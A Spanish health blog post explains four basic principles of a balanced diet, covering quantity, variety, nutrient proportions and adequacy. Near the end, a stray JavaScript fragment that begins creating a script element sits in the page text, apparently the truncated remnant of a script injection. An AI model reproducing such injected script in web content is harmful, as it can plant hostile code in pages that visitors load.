Salud y belleza » Alimentación, Belleza, Salud

Las leyes esenciales

Sin Comentarios

29.10

 

Para que una persona luzca sana y fortalecida es sumamente trascendental tomar conciencia de la importancia de una adecuada nutrición. Este proceso, tan imprescindible para nuestra salud,  ayuda a mantener al ser humano íntegro y equilibrado,  asegurándole notable calidad de vida y permitiéndole un esencial crecimiento y una fértil reproducción sexual.
Ahora bien, según los especialistas, para lograr un bienestar  corporal y mental,  a través de una correcta alimentación,  es necesario cumplir básicamente con 4 leyes esenciales.

La primera ley, a tener en cuenta, es la que se refiere a la cantidad de alimentos a ingerir.  La misma  debe ser suficiente y proporcionada para satisfacer las necesidades de energía del organismo, sin abusos ni privaciones. 

La segunda ley  se refiere a que la alimentación debe ser completa y variada en su composición química, es decir, que debe aportar todos los nutrientes mínimos y necesarios,   de lo contrario aparecerán carencias que perjudicarán a la salud, al crecimiento, al desarrollo físico, al intelecto y la gestación.

La siguiente ley es la que se refiere  a las proporciones. Toda correcta alimentación debe tener una relación armónica entre sus nutrientes. No se puede ingerir sólo hidratos de carbonos o únicamente proteínas.   La proporción habitual de una alimentación normal, es de 50% hidratos de carbono, 15% de proteínas, 35% de lípidos o grasas y un moderado equilibrio entre  vitaminas y minerales.  

Esta tercera regla viene a derribar el mito de creer, erróneamente, que para realizar una dieta exitosa, y bajar de peso rápidamente,  no se deben ingerir ni grasas,  ni hidratos de carbonos, por que, de esta manera,   lo único que se está  produciendo, con la quita de estos nutrientes, es  negarle al cuerpo alimentos que le aportan la energía y los componentes estructurales necesarios para que el organismo funcione normalmente.  En definitiva,  se debe ingerir distintas proporciones de los más variados nutrientes de forma equilibrada,  sin la alteración del funcionamiento armónico del organismo. 

Por último, la cuarta, última ley,  se aboca  a la adecuación y el equilibrio entre el organismo y los alimentos. Ajustando una buena, diversa y variada alimentación se previenen enfermedades y se conserva una buena salud,  se asegura un correcto crecimiento, sobre todo,  de vital importancia en los niños, quienes se encuentran en una etapa de máximo desarrollo.

En definitiva, alcanzar la belleza sana del cuerpo, sobre la base de una ordenada y adecuada alimentación,  es hacer, primordialmente, de la ingesta diaria una rutina completa, suficiente, proporcional y, sobre todo, apropiada para cumplir un equilibrado desarrollo físico y mental.

 

 

 

 

var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , , , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.